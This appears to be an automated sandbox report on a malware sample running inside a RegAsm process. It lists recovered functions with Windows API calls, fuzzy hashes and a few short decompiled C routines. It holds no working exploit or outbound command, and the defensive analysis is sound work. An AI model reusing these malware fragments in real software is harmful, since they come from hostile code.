Opcode Fuzzy Hash: a18d8a5c274955c05fd856d00bc1f82483dd14e9779f4fff601650199229c13e
Instruction Fuzzy Hash: 5601FC76108261FF8771EA265C58C2BBFBCEBC6760B008A19F961D2290C7208810C671

Uniqueness

Uniqueness Score: -1.00%

Function 03F1D603, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,03F0B9ED,?,?,?,?,?,?,?,?,?), ref: 03F1D617

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

mbstowcs.NTDLL ref: 03F1D631
lstrlen.KERNEL32(?,?,00000008), ref: 03F1D63C
mbstowcs.NTDLL ref: 03F1D656

Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 03F22F1B
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,?,00000000), ref: 03F22F27
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22F6F
Part of subcall function 03F22ECF: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F22F8A
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(0000002C), ref: 03F22FC2
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?), ref: 03F22FCA
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22FED
Part of subcall function 03F22ECF: wcscpy.NTDLL ref: 03F22FFF

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID:
API String ID: 1961997177-0
Opcode ID: 0e9517a97beb1c2de639a543df1373b2412d776d87909284bd32a590e7436f49
Instruction ID: f7115ced597da1b2a83ff9dd5c7e733cd974b54208d2f8350e826f0de64d4fc3
Opcode Fuzzy Hash: 0e9517a97beb1c2de639a543df1373b2412d776d87909284bd32a590e7436f49
Instruction Fuzzy Hash: B201F57B900309F7CB11EBA99C44F9F7FBCEF85250F144025BA059A140EA75D91097A0

Uniqueness

Uniqueness Score: -1.00%

Function 03F143BB, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 03F143C8
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 03F143EE
lstrcpy.KERNEL32(00000014,?), ref: 03F14413
memcpy.NTDLL(?,?,?), ref: 03F14420

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: 188ca979614b96dfe26fe8b942ce5176b02f848a72784a5012767412a2e2df4b
Instruction ID: 9b632cd96c4311ff42ddaf8794c223053e2282a0f2ca58a613e41d3fcc1a28fb
Opcode Fuzzy Hash: 188ca979614b96dfe26fe8b942ce5176b02f848a72784a5012767412a2e2df4b
Instruction Fuzzy Hash: 5511467190030AEFCB21DF58E884E9ABBF8FB58704F148429E95A9B220C770E914DF90

Uniqueness

Uniqueness Score: -1.00%

Function 03F117A2, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 03F117B5
lstrlen.KERNEL32(043AAAC0), ref: 03F117D6
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 03F117EE
lstrcpy.KERNEL32(00000000,043AAAC0), ref: 03F11800

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 311fbae213aa4e60e8a83d1156022acb90b535ed7db08ecaab2bbfe7297e5bc9
Instruction ID: 13aa739094736bcc7443d94fe259e8658460f915d9203e5bf3fb74e7abcb49fe
Opcode Fuzzy Hash: 311fbae213aa4e60e8a83d1156022acb90b535ed7db08ecaab2bbfe7297e5bc9
Instruction Fuzzy Hash: 6E01D676900348EFC721EBE9AC94E9FBBBCEB58201F144068E90AD3245D7749908DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03F1B956, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,7673D3B0,00000000,00000000,03F1F4E3,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000), ref: 03F1B95D
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 03F1B975
memcpy.NTDLL(0000000C,?,00000001,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1B98B

Part of subcall function 03F02734: StrChrA.SHLWAPI(00000000,03F1BD43,7673D3B0,043AB17C,00000000,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02759
Part of subcall function 03F02734: StrTrimA.SHLWAPI(00000000,03F2847C,00000000,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02778
Part of subcall function 03F02734: StrChrA.SHLWAPI(00000000,03F1BD43,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02784

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1B9BD

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFreeTrimlstrlenmemcpy
String ID:
API String ID: 3208927540-0
Opcode ID: c8afe6d46dce2ab2653fa97c3fd7a9ae1ea395cafee69b046e17c12cce207895
Instruction ID: 55eca7a41eeb2c795cc57c97947e036940cb7742b11c9fb5a583aa147ca58d9f
Opcode Fuzzy Hash: c8afe6d46dce2ab2653fa97c3fd7a9ae1ea395cafee69b046e17c12cce207895
Instruction Fuzzy Hash: EC01F23260034AEBE331EA52FC5CF2B7FB8EF90B11F044029F519D9091C7A09C169B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1C92D, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

RtlInitializeCriticalSection.NTDLL(03F2C300), ref: 03F1C951
RtlInitializeCriticalSection.NTDLL(03F2C2E0), ref: 03F1C967
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C978
GetModuleHandleA.KERNEL32(0000170B,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C9AC

Part of subcall function 03F10C18: GetModuleHandleA.KERNEL32(?,00000001,77639EB0,00000000,?,?,?,?,00000000,03F1C98F), ref: 03F10C30
Part of subcall function 03F10C18: LoadLibraryA.KERNEL32(?), ref: 03F10CD1
Part of subcall function 03F10C18: FreeLibrary.KERNEL32(00000000), ref: 03F10CDC

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: 1b7672123058280cf4aed90cb56da3d1b07cd68d7cda67db60bdd74825104384
Instruction ID: d542e304004999884d31a9fce0fa5ad339be864105e97a0c975a3fa492a89e18
Opcode Fuzzy Hash: 1b7672123058280cf4aed90cb56da3d1b07cd68d7cda67db60bdd74825104384
Instruction Fuzzy Hash: F611807694031DCFC730FFADB8A6A1D7BA8F765301B41052AD501D7298DBB498508BC0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D8F8, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F0D903
Sleep.KERNEL32(0000000A,?,?,03F0EDFB,00000000,?,03F2C140), ref: 03F0D90D
SetEvent.KERNEL32(?,?,03F0EDFB,00000000,?,03F2C140), ref: 03F0D964
RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F0D983

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: 15b5d8e4021b07b70d3acc8e37afe4b316176e000deee43e115cccc3e6af9f76
Instruction ID: b07767f9960f79acb863167b711ad2e3f5c0502444555aeef648b420d660e391
Opcode Fuzzy Hash: 15b5d8e4021b07b70d3acc8e37afe4b316176e000deee43e115cccc3e6af9f76
Instruction Fuzzy Hash: 10015271A4030DEBD720EBA8EC55F5A7BACEB14751F440121F609DA0E4D7B48E449755

Uniqueness

Uniqueness Score: -1.00%

Function 03F09103, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03F028DA: lstrlen.KERNEL32(?,?,00000000,03F09119), ref: 03F028DF
Part of subcall function 03F028DA: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 03F028F4
Part of subcall function 03F028DA: wsprintfA.USER32 ref: 03F02910
Part of subcall function 03F028DA: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03F0292C

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 03F09131
GetFileSize.KERNEL32(00000000,00000000), ref: 03F09140
CloseHandle.KERNEL32(00000000), ref: 03F0914A
GetLastError.KERNEL32 ref: 03F09152

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: b7f50a7006fd2d12a08689b854745912462596db329be18d14af306cf993a977
Instruction ID: b40c86654632a417267021a6d05a8ae183765957166d6ec18c16f3bb810a0fce
Opcode Fuzzy Hash: b7f50a7006fd2d12a08689b854745912462596db329be18d14af306cf993a977
Instruction Fuzzy Hash: 7BF0D136304228FADB30EB69DC8CF9BBE6CFF517A0F10801AF50AD51E1D7B48540A2A0

Uniqueness

Uniqueness Score: -1.00%

Function 03F22387, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 03F22399

Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,03F19EF0,00000000,03F19EF1,00000080,00000000,00000000,03F24E08,74E069A0,03F19EF0,?), ref: 03F17461
Part of subcall function 03F17420: GetLastError.KERNEL32 ref: 03F1746B
Part of subcall function 03F17420: WaitForSingleObject.KERNEL32(000000C8), ref: 03F17490
Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 03F174B1
Part of subcall function 03F17420: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03F174D9
Part of subcall function 03F17420: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 03F174EE
Part of subcall function 03F17420: SetEndOfFile.KERNEL32(00000001), ref: 03F174FB
Part of subcall function 03F17420: CloseHandle.KERNEL32(00000001), ref: 03F17513

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,03F024DC,?,?,00001000,?,?,00001000), ref: 03F223BC
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,03F024DC,?,?,00001000,?,?,00001000), ref: 03F223DE
GetLastError.KERNEL32(?,03F024DC,?,?,00001000,?,?,00001000), ref: 03F223F2

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: c36bec9362115f380db642289e9e472208fcc772e3e4023e1a579dc3967499cb
Instruction ID: 531800dc5496e0edb146460023341e43e979a3b54251402f87868392e188a236
Opcode Fuzzy Hash: c36bec9362115f380db642289e9e472208fcc772e3e4023e1a579dc3967499cb
Instruction Fuzzy Hash: 4DF06831244219FBDB21EF60AC19F5E3F25FF15711F144824FA02D80E0DBB19961A769

Uniqueness

Uniqueness Score: -1.00%

Function 03F1276A, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(03F2C000,00000000), ref: 03F12776
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 03F12791
lstrcpy.KERNEL32(00000000,?), ref: 03F127BA
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F127DB

Part of subcall function 03F1F92A: SetEvent.KERNEL32(?,?,03F1330E), ref: 03F1F93F
Part of subcall function 03F1F92A: WaitForSingleObject.KERNEL32(?,000000FF,?,?,03F1330E), ref: 03F1F95F
Part of subcall function 03F1F92A: CloseHandle.KERNEL32(00000000,?,03F1330E), ref: 03F1F968
Part of subcall function 03F1F92A: CloseHandle.KERNEL32(?,?,?,03F1330E), ref: 03F1F972
Part of subcall function 03F1F92A: RtlEnterCriticalSection.NTDLL(?), ref: 03F1F97A
Part of subcall function 03F1F92A: RtlLeaveCriticalSection.NTDLL(?), ref: 03F1F992
Part of subcall function 03F1F92A: CloseHandle.KERNEL32(?), ref: 03F1F9AE
Part of subcall function 03F1F92A: LocalFree.KERNEL32(?), ref: 03F1F9B9
Part of subcall function 03F1F92A: RtlDeleteCriticalSection.NTDLL(?), ref: 03F1F9C3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 1103286547-0
Opcode ID: f25dd6ff7f59bd870eed948710c12ce2508ca3a2e58cea48a36c206399be3162
Instruction ID: 3bb2868f7783f49917040830fdd62e9526cbf6e3b24d904d270baa9ee4069e69
Opcode Fuzzy Hash: f25dd6ff7f59bd870eed948710c12ce2508ca3a2e58cea48a36c206399be3162
Instruction Fuzzy Hash: EEF02236740315F7C630F7A2FC1DF4B3F25EB60B21F150010FA05EA2E4CA649811DA60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1B667, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,03F0B338,000000FF,043AA7F0,?,?,03F08EA1,0000003A,043AA7F0), ref: 03F1B683
GetLastError.KERNEL32(?,?,03F08EA1,0000003A,043AA7F0,?,03F0B86A,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F1B68E
WaitNamedPipeA.KERNEL32(00002710), ref: 03F1B6B0
WaitForSingleObject.KERNEL32(00000000,?,?,03F08EA1,0000003A,043AA7F0,?,03F0B86A,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32), ref: 03F1B6BE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: 4f81c2421af9104b40a73c6c5ad8302f0a058fb2fa4500a1aff8e6b8ca571b7a
Instruction ID: 867382f4ef28bd023e8f4df324227caf83349c47a28f7427a5ca7574b0afc35e
Opcode Fuzzy Hash: 4f81c2421af9104b40a73c6c5ad8302f0a058fb2fa4500a1aff8e6b8ca571b7a
Instruction Fuzzy Hash: EBF0F032A01125EBDB30AA24FC9CB4ABE14EB303A1F104171FA49E71B0C3611C60CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F028DA, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,03F09119), ref: 03F028DF
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 03F028F4
wsprintfA.USER32 ref: 03F02910

Part of subcall function 03F0612C: memset.NTDLL ref: 03F06141
Part of subcall function 03F0612C: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 03F0617A
Part of subcall function 03F0612C: wcstombs.NTDLL ref: 03F06184
Part of subcall function 03F0612C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 03F061B5
Part of subcall function 03F0612C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03F06849), ref: 03F061E1
Part of subcall function 03F0612C: TerminateProcess.KERNEL32(?,000003E5), ref: 03F061F7
Part of subcall function 03F0612C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03F06849), ref: 03F0620B
Part of subcall function 03F0612C: CloseHandle.KERNEL32(?), ref: 03F0623E
Part of subcall function 03F0612C: CloseHandle.KERNEL32(?), ref: 03F06243

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03F0292C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID:
API String ID: 1624158581-0
Opcode ID: ecff3162796706dbab27e1f5806240d3186353b800926f62f89827c594cf2d07
Instruction ID: 90be3d8807fb5278197c465f87059e9f5f947e74cd8a671ad0ae649b0b9e9584
Opcode Fuzzy Hash: ecff3162796706dbab27e1f5806240d3186353b800926f62f89827c594cf2d07
Instruction Fuzzy Hash: 24F0BE32600119FBC631B76DAC1CF6B7B6DEB92B21F150120F911D62E8CB609842AAB4

Uniqueness

Uniqueness Score: -1.00%

Function 03F0E049, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F0E052
Sleep.KERNEL32(0000000A,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F0E05C
HeapFree.KERNEL32(00000000,?,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F0E084
RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F0E0A2

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: a15216d43ead8fe1555b9f6467f21e2e13a08842d77ad63549bb18f5d7c91513
Instruction ID: 46e01db9743b72eef33a2c02cf30fe1e02123582f3378ca1412945dfa2ce0a0f
Opcode Fuzzy Hash: a15216d43ead8fe1555b9f6467f21e2e13a08842d77ad63549bb18f5d7c91513
Instruction Fuzzy Hash: 97F05E31201645EBD730EBA8DD68F0A7B74EB30301B148805F459C61F4C770E844EF19

Uniqueness

Uniqueness Score: -1.00%

Function 010A2F9F, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A2F9F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x10aa2c4; // 0x294
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x10aa308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x10aa2c4; // 0x294
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x10aa290; // 0x3010000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x010a2f9f
0x010a2fa6
0x010a2ff0
0x010a2ff2
0x010a2ff2
0x010a2faa
0x010a2fb0
0x010a2fb5
0x010a2fb9
0x010a2fbf
0x010a2fc6
0x00000000
0x00000000
0x010a2fc8
0x010a2fcd
0x00000000
0x00000000
0x00000000
0x010a2fcd
0x010a2fcf
0x010a2fd7
0x010a2fda
0x010a2fda
0x010a2fe0
0x010a2fe7
0x010a2fea
0x010a2fea
0x00000000

APIs

SetEvent.KERNEL32(00000294,00000001,010A3E7C), ref: 010A2FAA
SleepEx.KERNEL32(00000064,00000001), ref: 010A2FB9
CloseHandle.KERNEL32(00000294), ref: 010A2FDA
HeapDestroy.KERNEL32(03010000), ref: 010A2FEA

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: f8faf0a64c3ccb648e31d8db195305720eebdf50783501ade1a02cc72386537c
Instruction ID: 269d67747409a96fc4adc23dfadcff4455dd67bf7b0b5233ea866384e12e7680
Opcode Fuzzy Hash: f8faf0a64c3ccb648e31d8db195305720eebdf50783501ade1a02cc72386537c
Instruction Fuzzy Hash: 79F01C31745A219BE6705AB8DD4CF4B3BECAB04BA5B850574B984E76CCCA2AD800DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1960D, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F19616
Sleep.KERNEL32(0000000A,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F19620
HeapFree.KERNEL32(00000000,?,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1964E
RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F19663

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: dc3955f47ef592206daa5323b90303567a4d40095c61abc13126f9eabfd5b10a
Instruction ID: a9236d1c8e3a859fa2ebf32677bdedbfd1b2e186c30839e0e586bc0cd5c6a4de
Opcode Fuzzy Hash: dc3955f47ef592206daa5323b90303567a4d40095c61abc13126f9eabfd5b10a
Instruction Fuzzy Hash: 80F05E74611205DFE738EF54E878F1A7B64EB24301B184019E806C73A8CBB0EC54DEA9

Uniqueness

Uniqueness Score: -1.00%

Function 010A49B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A49B0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E010A6803(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E010A6A83(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E010A32A6(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x10aa290, 0, _t23);
				}
				return _t20;
			}

0x010a49b0
0x010a49c1
0x010a49c5
0x010a4a1e
0x010a49c7
0x010a49ce
0x010a49d4
0x010a49dd
0x010a49e1
0x010a49e7
0x010a49f7
0x010a4a09
0x010a4a09
0x010a4a14
0x010a4a14
0x010a4a25

APIs

Part of subcall function 010A6803: lstrlen.KERNEL32(?,00000000,03409CD0,7691C740,010A3EDC,03409ED5,?,?,?,?,?,69B25F44,E8FA7DD7,00000000,010A59A5), ref: 010A680A
Part of subcall function 010A6803: mbstowcs.NTDLL ref: 010A6833
Part of subcall function 010A6803: memset.NTDLL ref: 010A6845

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0340937C), ref: 010A49E7
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0340937C), ref: 010A4A14

Strings

Ut, xrefs: 010A4A14

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut
API String ID: 1500278894-8415677
Opcode ID: a315df88b9eaf56545dec5af5f35ba01dd290dbc4ca6287ea4c6b160b9b12a47
Instruction ID: 25ef4cd493298a513e0deb9ce2dc73ca8aee95606510212b2a0084c5ec22cdab
Opcode Fuzzy Hash: a315df88b9eaf56545dec5af5f35ba01dd290dbc4ca6287ea4c6b160b9b12a47
Instruction Fuzzy Hash: 4601A23260020ABBDB215FD8DC44FDB7FB9FB84744F804024FA8096154E7B2D924C790

Uniqueness

Uniqueness Score: -1.00%

Function 03F2273F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?), ref: 03F22783
StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 03F22795

Strings

0x, xrefs: 03F2277D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID: 0x
API String ID: 3510742995-3225541890
Opcode ID: 44c8c7b51db3a23cdd70e7f011c2b3ba287b7e038660a074ae8bdb5fa0ea5487
Instruction ID: 1f6c7ffe53c03274f59afd4007091acde64cfbd7fca9b1b3835d0e2f5d71eb04
Opcode Fuzzy Hash: 44c8c7b51db3a23cdd70e7f011c2b3ba287b7e038660a074ae8bdb5fa0ea5487
Instruction Fuzzy Hash: 2C01713590062AFBDB41EFA8D845AAEBBB9EB54704F044465E904E7204E774EA09C791

Uniqueness

Uniqueness Score: -1.00%

Function 03F103D8, Relevance: 5.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F10437
CloseHandle.KERNEL32(?,?,00000100,?,?,?,?,00000000), ref: 03F10485
HeapFree.KERNEL32(00000000,?,?,?,00000094,03F1DFE4,00000000,?,03F18DB0,00000000,?,03F13352,00000000,?,03F02FBB,00000000), ref: 03F107C9
GetLastError.KERNEL32(00000000,?,00000000), ref: 03F10A10

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 8e879c1f8d0cca27aff10ed50c22c3dac6f9075010e4f94862715b6333cce08e
Instruction ID: 24bae07f10854838aa1f66b52534e4b765fd047175a44ed6e9475e903766e9eb
